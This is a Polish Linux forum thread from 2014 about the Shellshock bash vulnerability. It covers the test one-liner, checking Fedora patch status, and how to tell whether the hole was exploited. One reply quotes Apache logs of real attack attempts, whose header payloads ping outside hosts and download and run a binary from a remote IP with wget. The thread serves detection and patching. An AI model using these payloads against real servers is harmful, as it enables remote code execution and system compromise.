Czy Bash Jest Naprawdę Dziurawy?

[@WalDo]

Nie wiem czy czytaliście http://niebezpiecznik.pl/post/dziura-w-bashu/

 

Wykonałem jako zwykły user polecenie testujące:

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

O ile w F20

[waldo@F20 ~]$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
this is a test

czyli - przynajmniej ja tak to rozumiem - jest bezpiecznie, to już w F21 tak fajnie nie jest:

[waldo@localhost ~]$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
vulnerable
this is a test

mimo, że na stronie https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/ piszą

Update 2014-09-30 19:30 UTC

 

Questions have arisen around whether Red Hat products are vulnerable to CVE-2014-6277 and CVE-2014-6278. We have determined that RHSA-2014:1306, RHSA-2014:1311, and RHSA-2014:1312 successfully mitigate the vulnerability and no additional actions need to be taken.

Może jest tu na forum ktoś, kto specjalizuje się w bezpieczeństwie systemu i potrafi mi wyjaśnić dokładnie o co chodzi? Informacja z RH sugeruje, że wszystkie dziury zostały załatane, ale czy na pewno?

Czy można jakoś sprawdzić czy ktoś nie wykorzystał tej dziury?

 

 

[EDIT]

Trochę zafałszowałem informację. Po zaktualizowaniu F21 wyglada na to, że F21 też jest OK, ale pytanie jest aktualne: czy można jakoś sprawdzić czy ktoś nie wykorzystał tej dziury?

 

Akutualizuję system często, w zasadzie na bieżąco, ale niepokoi mnie co się mogło dziać między 25. lipca a 26. września

[root@F20 log]# grep bash yum.log
Jul 25 19:17:50 Updated: bash-4.2.47-3.fc20.x86_64 # "dziurawa" wersja
Sep 26 13:43:59 Updated: bash-4.2.48-2.fc20.x86_64 # wersja "załatana"

No i oczywiście ewidentny wniosek: aktualizować system tak często jak to się da, choćby i 3 razy dziennie.

I jeszcze tylko pytanie czy jest jakiś sposób alarmowania o takich dziurach inny, lepszy niż śledzenie np. https://securityblog.redhat.com/ czy wspomnianego wyżej http://niebezpiecznik.pl/?

 

Jeszcze tylko lektura: http://niebezpiecznik.pl/post/chinczycy-juz-wykorzystuja-dziure-w-bashu-do-atakow/

[@sunrise]

Możesz sprawdzić logi serwera www, jeżeli serwer nie wykonuje żadnych skryptów cgi ,php lub inne  które korzystają z basha to raczej nie masz się czego bać, dodatkowo jeżeli masz selinux to raczej bardzo mało prawdopodobne, aby ktoś wykorzystał dziurę http://danwalsh.livejournal.com/71122.html http://danwalsh.livejournal.com/71396.html

 

Próby wykorzystania błędu u mnie, logi z apacha

09.126.230.72 - - [25/Sep/2014:01:48:47 +0200] "GET / HTTP/1.0" 200 1933 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
89.207.135.125 - - [25/Sep/2014:10:38:27 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 224 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
89.207.135.125 - - [25/Sep/2014:15:10:11 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 224 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
54.251.83.67 - - [26/Sep/2014:04:34:41 +0200] "GET / HTTP/1.1" 200 1933 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
54.251.83.67 - - [26/Sep/2014:23:32:34 +0200] "GET / HTTP/1.1" 200 1933 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
70.42.149.69 - - [27/Sep/2014:09:44:44 +0200] "GET /test HTTP/1.0" 404 202 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\""
70.42.149.69 - - [27/Sep/2014:09:44:44 +0200] "GET / HTTP/1.0" 200 1933 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\""
70.42.149.69 - - [27/Sep/2014:09:44:44 +0200] "GET /cgi-bin/test.sh HTTP/1.0" 404 213 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\""
66.150.114.30 - - [27/Sep/2014:10:35:47 +0200] "GET /cgi-bin/test.sh HTTP/1.0" 404 213 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\""
66.150.114.30 - - [27/Sep/2014:10:35:47 +0200] "GET /test HTTP/1.0" 404 202 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\""
66.150.114.30 - - [27/Sep/2014:10:35:47 +0200] "GET / HTTP/1.0" 200 1933 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\""

Ciekawy artykuł o błędzie https://badsector.pl/w-praktyce/artykuly/shellshock-i-opowiesc-o-srodowisku.174.html

 

Co do stron proponuję również http://zaufanatrzeciastrona.pl/

[@WalDo]

Dzięki za informacje. Mam tylko zwykła stację roboczą, nie wystawiam żadnych serwisów, więc pytanie z mojej strony ma przede wszystkim charakter poznawczy.

 

Na wszelki wypadek przeleciałem logi i nic szczególnego na szczęście nie znajduję SElinux działa, chociaż z tego co ktoś tu kiedyś napisał na forum SElinux na workstation to przerost formy nad treścią i można wyłączyć. Można i przez jakiś czas miałem nawet wyłączony, ale potem stwierdziłem, że jednak jak już jest, to niech działa - w sumie nie przeszkadza mi to, czasem wymaga dodania jakiejś regułki zazwyczaj "podpowiadanej", więc nie ma problemu.

 

Dzięki za linki.